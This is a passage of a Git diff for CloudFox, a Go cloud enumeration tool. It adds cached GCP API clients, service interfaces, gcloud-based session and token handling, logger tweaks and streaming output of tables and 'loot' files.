CachedGetAPIKeysService returns a cached API Keys service +func CachedGetAPIKeysService(ctx context.Context, session 
*gcpinternal.SafeSession) (*apikeys.Service, error) { + cacheKey := CacheKey("client", "apikeys") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*apikeys.Service), nil + } + service, err := GetAPIKeysService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetOrgPolicyService returns a cached Org Policy service +func CachedGetOrgPolicyService(ctx context.Context, session *gcpinternal.SafeSession) (*orgpolicy.Service, error) { + cacheKey := CacheKey("client", "orgpolicy") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*orgpolicy.Service), nil + } + service, err := GetOrgPolicyService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSourceRepoService returns a cached Source Repo service +func CachedGetSourceRepoService(ctx context.Context, session *gcpinternal.SafeSession) (*sourcerepo.Service, error) { + cacheKey := CacheKey("client", "sourcerepo") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sourcerepo.Service), nil + } + service, err := GetSourceRepoService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBeyondCorpService returns a cached BeyondCorp service +func CachedGetBeyondCorpService(ctx context.Context, session *gcpinternal.SafeSession) (*beyondcorp.Service, error) { + cacheKey := CacheKey("client", "beyondcorp") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*beyondcorp.Service), nil + } + service, err := GetBeyondCorpService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAPService returns a cached IAP service +func CachedGetIAPService(ctx context.Context, session *gcpinternal.SafeSession) (*iap.Service, error) { 
+ cacheKey := CacheKey("client", "iap") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iap.Service), nil + } + service, err := GetIAPService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCertificateManagerService returns a cached Certificate Manager service +func CachedGetCertificateManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*certificatemanager.Service, error) { + cacheKey := CacheKey("client", "certificatemanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*certificatemanager.Service), nil + } + service, err := GetCertificateManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetServiceNetworkingService returns a cached Service Networking service +func CachedGetServiceNetworkingService(ctx context.Context, session *gcpinternal.SafeSession) (*servicenetworking.APIService, error) { + cacheKey := CacheKey("client", "servicenetworking") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*servicenetworking.APIService), nil + } + service, err := GetServiceNetworkingService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetArtifactRegistryService returns a cached Artifact Registry service +func CachedGetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistryapi.Service, error) { + cacheKey := CacheKey("client", "artifactregistry") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*artifactregistryapi.Service), nil + } + service, err := GetArtifactRegistryService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudRunServiceV2 returns a cached Cloud 
Run v2 service +func CachedGetCloudRunServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*runv2.Service, error) { + cacheKey := CacheKey("client", "cloudrunv2") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*runv2.Service), nil + } + service, err := GetCloudRunServiceV2(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerClient returns a cached Secret Manager client (Go SDK) +func CachedGetSecretManagerClient(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerclient.Client, error) { + cacheKey := CacheKey("client", "secretmanager-gosdk") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanagerclient.Client), nil + } + client, err := GetSecretManagerClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetAssetClient returns a cached Asset client +func CachedGetAssetClient(ctx context.Context, session *gcpinternal.SafeSession) (*asset.Client, error) { + cacheKey := CacheKey("client", "asset") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*asset.Client), nil + } + client, err := GetAssetClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetArtifactRegistryClient returns a cached Artifact Registry client (Go SDK) +func CachedGetArtifactRegistryClient(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Client, error) { + cacheKey := CacheKey("client", "artifactregistry-gosdk") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*artifactregistry.Client), nil + } + client, err := GetArtifactRegistryClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// 
CachedGetOrganizationsClient returns a cached Organizations client +func CachedGetOrganizationsClient(ctx context.Context, session *gcpinternal.SafeSession) (*resourcemanager.OrganizationsClient, error) { + cacheKey := CacheKey("client", "organizations") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*resourcemanager.OrganizationsClient), nil + } + client, err := GetOrganizationsClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} diff --git a/internal/gcp/sdk/interfaces.go b/internal/gcp/sdk/interfaces.go new file mode 100644 index 00000000..024957fa --- /dev/null +++ b/internal/gcp/sdk/interfaces.go @@ -0,0 +1,138 @@ +package sdk + +import ( + "context" + + "cloud.google.com/go/iam" + "cloud.google.com/go/storage" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudresourcemanagerv2 "google.golang.org/api/cloudresourcemanager/v2" + compute "google.golang.org/api/compute/v1" + iam_admin "google.golang.org/api/iam/v1" + secretmanager "google.golang.org/api/secretmanager/v1" +) + +// StorageClientInterface defines the interface for Cloud Storage operations +type StorageClientInterface interface { + Buckets(ctx context.Context, projectID string) *storage.BucketIterator + Bucket(name string) *storage.BucketHandle + Close() error +} + +// StorageBucketInterface defines the interface for bucket operations +type StorageBucketInterface interface { + Attrs(ctx context.Context) (*storage.BucketAttrs, error) + IAM() *iam.Handle + Object(name string) *storage.ObjectHandle + Objects(ctx context.Context, q *storage.Query) *storage.ObjectIterator +} + +// ComputeServiceInterface defines the interface for Compute Engine operations +type ComputeServiceInterface interface { + // Instances + ListInstances(ctx context.Context, projectID, zone string) (*compute.InstanceList, error) + AggregatedListInstances(ctx context.Context, projectID string) 
(*compute.InstanceAggregatedList, error) + GetInstance(ctx context.Context, projectID, zone, instanceName string) (*compute.Instance, error) + + // Networks + ListNetworks(ctx context.Context, projectID string) (*compute.NetworkList, error) + GetNetwork(ctx context.Context, projectID, networkName string) (*compute.Network, error) + + // Firewalls + ListFirewalls(ctx context.Context, projectID string) (*compute.FirewallList, error) + + // Zones + ListZones(ctx context.Context, projectID string) (*compute.ZoneList, error) +} + +// IAMServiceInterface defines the interface for IAM operations +type IAMServiceInterface interface { + // Service Accounts + ListServiceAccounts(ctx context.Context, projectID string) ([]*iam_admin.ServiceAccount, error) + GetServiceAccount(ctx context.Context, name string) (*iam_admin.ServiceAccount, error) + ListServiceAccountKeys(ctx context.Context, name string) ([]*iam_admin.ServiceAccountKey, error) + + // Roles + ListRoles(ctx context.Context, projectID string) ([]*iam_admin.Role, error) + GetRole(ctx context.Context, name string) (*iam_admin.Role, error) +} + +// ResourceManagerServiceInterface defines the interface for Cloud Resource Manager operations +type ResourceManagerServiceInterface interface { + // Projects + ListProjects(ctx context.Context) ([]*cloudresourcemanager.Project, error) + GetProject(ctx context.Context, projectID string) (*cloudresourcemanager.Project, error) + GetProjectIAMPolicy(ctx context.Context, projectID string) (*cloudresourcemanager.Policy, error) + + // Organizations + ListOrganizations(ctx context.Context) ([]*cloudresourcemanager.Organization, error) + GetOrganization(ctx context.Context, name string) (*cloudresourcemanager.Organization, error) + GetOrganizationIAMPolicy(ctx context.Context, resource string) (*cloudresourcemanager.Policy, error) + + // Folders + ListFolders(ctx context.Context, parent string) ([]*cloudresourcemanagerv2.Folder, error) +} + +// SecretManagerServiceInterface defines the 
interface for Secret Manager operations +type SecretManagerServiceInterface interface { + // Secrets + ListSecrets(ctx context.Context, projectID string) ([]*secretmanager.Secret, error) + GetSecret(ctx context.Context, name string) (*secretmanager.Secret, error) + ListSecretVersions(ctx context.Context, secretName string) ([]*secretmanager.SecretVersion, error) + AccessSecretVersion(ctx context.Context, name string) (*secretmanager.AccessSecretVersionResponse, error) +} + +// BigQueryServiceInterface defines the interface for BigQuery operations +type BigQueryServiceInterface interface { + ListDatasets(ctx context.Context, projectID string) ([]string, error) + ListTables(ctx context.Context, projectID, datasetID string) ([]string, error) + GetDatasetIAMPolicy(ctx context.Context, projectID, datasetID string) (interface{}, error) + GetTableIAMPolicy(ctx context.Context, projectID, datasetID, tableID string) (interface{}, error) +} + +// ArtifactRegistryServiceInterface defines the interface for Artifact Registry operations +type ArtifactRegistryServiceInterface interface { + ListRepositories(ctx context.Context, projectID, location string) ([]interface{}, error) + GetRepository(ctx context.Context, name string) (interface{}, error) + ListDockerImages(ctx context.Context, parent string) ([]interface{}, error) +} + +// CloudFunctionsServiceInterface defines the interface for Cloud Functions operations +type CloudFunctionsServiceInterface interface { + ListFunctions(ctx context.Context, projectID, location string) ([]interface{}, error) + GetFunction(ctx context.Context, name string) (interface{}, error) + GetFunctionIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// CloudRunServiceInterface defines the interface for Cloud Run operations +type CloudRunServiceInterface interface { + ListServices(ctx context.Context, projectID, location string) ([]interface{}, error) + GetService(ctx context.Context, name string) (interface{}, error) + 
GetServiceIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// GKEServiceInterface defines the interface for GKE operations +type GKEServiceInterface interface { + ListClusters(ctx context.Context, projectID, location string) ([]interface{}, error) + GetCluster(ctx context.Context, name string) (interface{}, error) +} + +// PubSubServiceInterface defines the interface for Pub/Sub operations +type PubSubServiceInterface interface { + ListTopics(ctx context.Context, projectID string) ([]interface{}, error) + ListSubscriptions(ctx context.Context, projectID string) ([]interface{}, error) + GetTopicIAMPolicy(ctx context.Context, topic string) (interface{}, error) +} + +// KMSServiceInterface defines the interface for KMS operations +type KMSServiceInterface interface { + ListKeyRings(ctx context.Context, projectID, location string) ([]interface{}, error) + ListCryptoKeys(ctx context.Context, keyRing string) ([]interface{}, error) + GetCryptoKeyIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// LoggingServiceInterface defines the interface for Cloud Logging operations +type LoggingServiceInterface interface { + ListSinks(ctx context.Context, parent string) ([]interface{}, error) + ListMetrics(ctx context.Context, parent string) ([]interface{}, error) +} diff --git a/internal/gcp/session.go b/internal/gcp/session.go new file mode 100644 index 00000000..81640420 --- /dev/null +++ b/internal/gcp/session.go @@ -0,0 +1,442 @@ +package gcpinternal + +import ( + "context" + "encoding/json" + "fmt" + "os/exec" + "strings" + "sync" + "time" + + "golang.org/x/oauth2" + "golang.org/x/oauth2/google" + "google.golang.org/api/option" +) + +// CommonScopes defines the common OAuth scopes used by GCP services +var CommonScopes = []string{ + "https://www.googleapis.com/auth/cloud-platform", // Full GCP access + "https://www.googleapis.com/auth/cloud-platform.read-only", // Read-only GCP access + 
"https://www.googleapis.com/auth/compute", // Compute Engine access + "https://www.googleapis.com/auth/devstorage.full_control", // Cloud Storage full access +} + +// SafeSession provides thread-safe GCP authentication with token caching and auto-refresh +type SafeSession struct { + mu sync.Mutex + tokenSource oauth2.TokenSource + currentToken *oauth2.Token + tokens map[string]*oauth2.Token // scope -> token + sessionExpiry time.Time // When the current token expires + monitoring bool // Whether background monitoring is active + stopMonitor chan struct{} // Signal to stop monitoring + refreshBuffer time.Duration // How early to refresh before expiry (default 5 min) + + // Identity info + email string + projectID string + accountType string // "user" or "serviceAccount" +} + +// GCPCredentialInfo holds information about the current credential +type GCPCredentialInfo struct { + Email string `json:"email"` + AccountType string `json:"account_type"` // user, serviceAccount + ProjectID string `json:"project_id"` + Scopes []string +} + +// StaticTokenSource wraps a token for use with GCP clients +type StaticTokenSource struct { + StaticToken *oauth2.Token +} + +// Token returns the static token (implements oauth2.TokenSource) +func (s *StaticTokenSource) Token() (*oauth2.Token, error) { + return s.StaticToken, nil +} + +// NewSafeSession initializes a session using Application Default Credentials +// and prefetches tokens for common scopes +func NewSafeSession(ctx context.Context) (*SafeSession, error) { + // Check if gcloud is authenticated + if !IsSessionValid() { + return nil, fmt.Errorf("GCP session invalid; run 'gcloud auth application-default login' or 'gcloud auth login'") + } + + // Create token source from ADC + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) 
+ if err != nil { + return nil, fmt.Errorf("failed to create token source: %w", err) + } + + ss := &SafeSession{ + tokenSource: ts, + tokens: make(map[string]*oauth2.Token), + refreshBuffer: 5 * time.Minute, + stopMonitor: make(chan struct{}), + } + + // Get initial token and extract expiry + token, err := ts.Token() + if err != nil { + return nil, fmt.Errorf("failed to get initial token: %w", err) + } + ss.currentToken = token + ss.sessionExpiry = token.Expiry + + // Get identity info + info, err := ss.getCurrentIdentity(ctx) + if err == nil { + ss.email = info.Email + ss.accountType = info.AccountType + ss.projectID = info.ProjectID + } + + // Cache the token for the default scope + ss.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return ss, nil +} + +// NewSmartSession creates a session with automatic monitoring and refresh +func NewSmartSession(ctx context.Context) (*SafeSession, error) { + ss, err := NewSafeSession(ctx) + if err != nil { + return nil, err + } + + // Start background monitoring + ss.StartMonitoring(ctx) + + return ss, nil +} + +// ------------------------- TOKEN METHODS ------------------------- + +// GetToken returns a valid access token, refreshing if necessary +func (s *SafeSession) GetToken(ctx context.Context) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + return s.getTokenUnlocked(ctx) +} + +// getTokenUnlocked returns a token without locking (caller must hold lock) +func (s *SafeSession) getTokenUnlocked(ctx context.Context) (string, error) { + // Check if current token is still valid + if s.currentToken != nil && s.currentToken.Valid() { + return s.currentToken.AccessToken, nil + } + + // Refresh the token + token, err := s.tokenSource.Token() + if err != nil { + return "", fmt.Errorf("failed to refresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + return token.AccessToken, nil +} + +// GetTokenForScope returns a token for a specific OAuth scope +func (s 
*SafeSession) GetTokenForScope(ctx context.Context, scope string) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + + // Check cache first + if tok, ok := s.tokens[scope]; ok && tok.Valid() { + return tok.AccessToken, nil + } + + // Get a new token source for this scope + ts, err := google.DefaultTokenSource(ctx, scope) + if err != nil { + return "", fmt.Errorf("failed to create token source for scope %s: %w", scope, err) + } + + token, err := ts.Token() + if err != nil { + return "", fmt.Errorf("failed to get token for scope %s: %w", scope, err) + } + + // Cache the token + s.tokens[scope] = token + + return token.AccessToken, nil +} + +// GetTokenSource returns the underlying token source for use with GCP clients +func (s *SafeSession) GetTokenSource() oauth2.TokenSource { + return s.tokenSource +} + +// GetClientOption returns a client option for use with GCP API clients +func (s *SafeSession) GetClientOption() option.ClientOption { + return option.WithTokenSource(s.tokenSource) +} + +// GetTokenWithRetry attempts to get a token with automatic retry on failure +func (s *SafeSession) GetTokenWithRetry(ctx context.Context) (string, error) { + token, err := s.GetToken(ctx) + if err != nil { + // Try to refresh session and retry once + if refreshErr := s.RefreshSession(ctx); refreshErr == nil { + token, err = s.GetToken(ctx) + } + } + return token, err +} + +// ------------------------- SESSION MANAGEMENT ------------------------- + +// Ensure validates or refreshes the current session +func (s *SafeSession) Ensure(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + if s.currentToken != nil && s.currentToken.Valid() { + return nil + } + + // Try to get a new token + token, err := s.tokenSource.Token() + if err != nil { + return fmt.Errorf("GCP session invalid or expired: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + return nil +} + +// IsSessionExpired checks if the session has expired or will expire soon +func (s 
*SafeSession) IsSessionExpired() bool { + s.mu.Lock() + defer s.mu.Unlock() + + if s.sessionExpiry.IsZero() { + return false + } + + // Consider expired if within refresh buffer + return time.Now().Add(s.refreshBuffer).After(s.sessionExpiry) +} + +// RefreshSession refreshes the token and clears the cache +func (s *SafeSession) RefreshSession(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + // Check if gcloud session is still valid + if !IsSessionValid() { + return fmt.Errorf("GCP session expired; please run 'gcloud auth login' or 'gcloud auth application-default login'") + } + + // Create new token source + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return fmt.Errorf("failed to create token source: %w", err) + } + s.tokenSource = ts + + // Get fresh token + token, err := ts.Token() + if err != nil { + return fmt.Errorf("failed to get fresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + // Clear token cache + s.tokens = make(map[string]*oauth2.Token) + s.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return nil +} + +// ------------------------- MONITORING ------------------------- + +// StartMonitoring begins background monitoring of session health +func (s *SafeSession) StartMonitoring(ctx context.Context) { + s.mu.Lock() + if s.monitoring { + s.mu.Unlock() + return + } + s.monitoring = true + s.mu.Unlock() + + go s.monitorSession(ctx) +} + +// StopMonitoring stops the background session monitor +func (s *SafeSession) StopMonitoring() { + s.mu.Lock() + defer s.mu.Unlock() + + if !s.monitoring { + return + } + + s.monitoring = false + close(s.stopMonitor) +} + +// monitorSession runs in background to monitor and refresh session +func (s *SafeSession) monitorSession(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-s.stopMonitor: + return + case <-ctx.Done(): + return + case 
<-ticker.C: + if s.IsSessionExpired() { + if err := s.RefreshSession(ctx); err != nil { + fmt.Printf("smart session: auto-refresh failed: %v\n", err) + fmt.Println("smart session: please run 'gcloud auth login' to re-authenticate") + } + } + } + } +} + +// ------------------------- IDENTITY INFO ------------------------- + +// GetEmail returns the email of the authenticated identity +func (s *SafeSession) GetEmail() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.email +} + +// GetAccountType returns the type of account (user or serviceAccount) +func (s *SafeSession) GetAccountType() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.accountType +} + +// GetProjectID returns the default project ID +func (s *SafeSession) GetProjectID() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.projectID +} + +// GetSessionExpiry returns when the current token expires +func (s *SafeSession) GetSessionExpiry() time.Time { + s.mu.Lock() + defer s.mu.Unlock() + return s.sessionExpiry +} + +// getCurrentIdentity retrieves identity info from gcloud +func (s *SafeSession) getCurrentIdentity(ctx context.Context) (*GCPCredentialInfo, error) { + // Try gcloud auth list to get current account + out, err := exec.CommandContext(ctx, "gcloud", "auth", "list", "--filter=status:ACTIVE", "--format=json").Output() + if err != nil { + return nil, fmt.Errorf("failed to get gcloud auth list: %w", err) + } + + var accounts []struct { + Account string `json:"account"` + Status string `json:"status"` + } + if err := json.Unmarshal(out, &accounts); err != nil { + return nil, fmt.Errorf("failed to parse gcloud auth list: %w", err) + } + + info := &GCPCredentialInfo{} + if len(accounts) > 0 { + info.Email = accounts[0].Account + // Determine account type from email format + if strings.Contains(info.Email, ".iam.gserviceaccount.com") { + info.AccountType = "serviceAccount" + } else { + info.AccountType = "user" + } + } + + // Get default project + projectOut, err := 
exec.CommandContext(ctx, "gcloud", "config", "get-value", "project").Output() + if err == nil { + info.ProjectID = strings.TrimSpace(string(projectOut)) + } + + return info, nil +} + +// CurrentUser returns the current identity's email and account type +func (s *SafeSession) CurrentUser(ctx context.Context) (email, accountType string, err error) { + info, err := s.getCurrentIdentity(ctx) + if err != nil { + return "UNKNOWN", "UNKNOWN", err + } + return info.Email, info.AccountType, nil +} + +// ------------------------- HELPER FUNCTIONS ------------------------- + +// IsSessionValid checks if gcloud is authenticated +func IsSessionValid() bool { + // Check if we can get a token via gcloud + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return false + } + + token := strings.TrimSpace(string(out)) + return token != "" && !strings.Contains(token, "ERROR") +} + +// IsADCConfigured checks if Application Default Credentials are configured +func IsADCConfigured() bool { + ctx := context.Background() + _, err := google.DefaultTokenSource(ctx, "https://www.googleapis.com/auth/cloud-platform") + return err == nil +} + +// GetDefaultProject returns the default GCP project from gcloud config +func GetDefaultProject() string { + out, err := exec.Command("gcloud", "config", "get-value", "project").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetDefaultAccount returns the default account from gcloud config +func GetDefaultAccount() string { + out, err := exec.Command("gcloud", "config", "get-value", "account").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetAccessToken returns a fresh access token from gcloud CLI +// This is useful for REST API calls that need a bearer token +func GetAccessToken() (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return "", fmt.Errorf("failed 
to get access token: %w", err) + } + return strings.TrimSpace(string(out)), nil +} + +// GetAccessTokenForAccount returns an access token for a specific account +func GetAccessTokenForAccount(account string) (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token", "--account", account).Output() + if err != nil { + return "", fmt.Errorf("failed to get access token for account %s: %w", account, err) + } + return strings.TrimSpace(string(out)), nil +} diff --git a/internal/log.go b/internal/log.go index 9b89fe4e..853dbc00 100644 --- a/internal/log.go +++ b/internal/log.go @@ -19,6 +19,8 @@ func init() { text.EnableColors() } +// Note: clearln is defined in aws.go as "\r\x1b[2K" and is used to clear spinner status lines + // This function returns ~/.cloudfox. // If the folder does not exist the function creates it. func GetLogDirPath() *string { @@ -54,7 +56,7 @@ func (l *Logger) Info(text string) { func (l *Logger) InfoM(text string, module string) { var cyan = color.New(color.FgCyan).SprintFunc() - fmt.Printf("[%s][%s] %s\n", cyan(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), cyan(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", cyan(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), cyan(module), text) } func (l *Logger) Success(text string) { @@ -62,7 +64,19 @@ func (l *Logger) Success(text string) { } func (l *Logger) SuccessM(text string, module string) { var green = color.New(color.FgGreen).SprintFunc() - fmt.Printf("[%s][%s] %s\n", green(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), green(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", green(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), green(module), text) +} + +func (l *Logger) Warn(text string) { + l.WarnM(text, "config") +} + +func (l *Logger) WarnM(text string, module string) { + var yellow = color.New(color.FgYellow).SprintFunc() + fmt.Printf(clearln+"[%s][%s] ⚠️ %s\n", yellow(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), yellow(module), 
text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] WARNING: %s", module, text) + } } func (l *Logger) Error(text string) { @@ -71,8 +85,10 @@ func (l *Logger) Error(text string) { func (l *Logger) ErrorM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) - l.txtLog.Printf("[%s] %s", module, text) + fmt.Printf(clearln+"[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } } func (l *Logger) Fatal(text string) { @@ -81,7 +97,9 @@ func (l *Logger) Fatal(text string) { func (l *Logger) FatalM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - l.txtLog.Printf("[%s] %s", module, text) - fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } + fmt.Printf(clearln+"[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) os.Exit(1) } diff --git a/internal/output2.go b/internal/output2.go old mode 100644 new mode 100755 index 1cce6b57..171a90bd --- a/internal/output2.go +++ b/internal/output2.go @@ -1,6 +1,7 @@ package internal import ( + "bufio" "encoding/csv" "encoding/json" "fmt" @@ -9,6 +10,7 @@ import ( "path/filepath" "regexp" "strings" + "sync" "github.com/aquasecurity/table" "github.com/fatih/color" @@ -23,6 +25,9 @@ var fileSystem = afero.NewOsFs() // Color functions var cyan = color.New(color.FgCyan).SprintFunc() +// global lock to prevent concurrent write races +var lootFileMu sync.Mutex + type OutputClient struct { Verbosity int CallingModule string @@ -59,6 +64,20 @@ type LootFile struct { Contents string } +// TableCol represents a column definition for table output +type TableCol struct { + Name string + Width int +} + +// TableFiles represents 
table output configuration +type TableFiles struct { + Directory string + TableCols []TableCol + ResultsFile string + LootFile string +} + // TODO support datastructures that enable brief or wide format type CloudfoxOutput interface { TableFiles() []TableFile @@ -102,6 +121,425 @@ func HandleOutput( return nil } +// HandleStreamingOutput writes table and loot files incrementally, then finalizes tables at the end. +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func HandleStreamingOutput( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(dataToOutput.TableFiles()) > 0 { + baseCloudfoxModule = dataToOutput.TableFiles()[0].Name + } + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + if err := os.MkdirAll(outDirectoryPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // ---- STREAM ROWS TO TEMP FILES ---- + for _, t := range dataToOutput.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + tmpTablePath := filepath.Join(outDirectoryPath, safeName+".tmp") + if err := os.MkdirAll(filepath.Dir(tmpTablePath), 0o755); err != nil { + return fmt.Errorf("failed to create parent directory for temp table: %w", err) + } + + tmpTableFile, err := 
os.OpenFile(tmpTablePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open temporary table file: %w", err) + } + defer tmpTableFile.Close() + + // Append each row into the tmp file + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + if _, err := tmpTableFile.WriteString(strings.Join(cleanRow, ",") + "\n"); err != nil { + return fmt.Errorf("failed to append row to tmp table: %w", err) + } + } + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outDirectoryPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + defer csvFile.Close() + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outDirectoryPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + } + } + + // ---- STREAM LOOT ---- + for _, l := range dataToOutput.LootFiles() { + lootDir := filepath.Join(outDirectoryPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer lootFile.Close() + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := 
lootFile.WriteString(scanner.Text() + "\n"); err != nil { + return fmt.Errorf("failed to append loot line: %w", err) + } + } + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + } + + // ---- FINALIZE TABLES MEMORY-SAFE ---- + if err := StreamFinalizeTables(cloudProvider, format, outputDirectory, verbosity, wrap, scopeType, scopeIdentifiers, scopeNames, principal, nil); err != nil { + return fmt.Errorf("failed to finalize tables: %w", err) + } + + // Log individual output files like the non-streaming output does + for _, t := range dataToOutput.TableFiles() { + safeName := sanitizeFileName(t.Name) + if format == "all" || format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "table", safeName+".txt")), baseCloudfoxModule) + } + if format == "all" || format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if format == "all" || format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "json", safeName+".jsonl")), 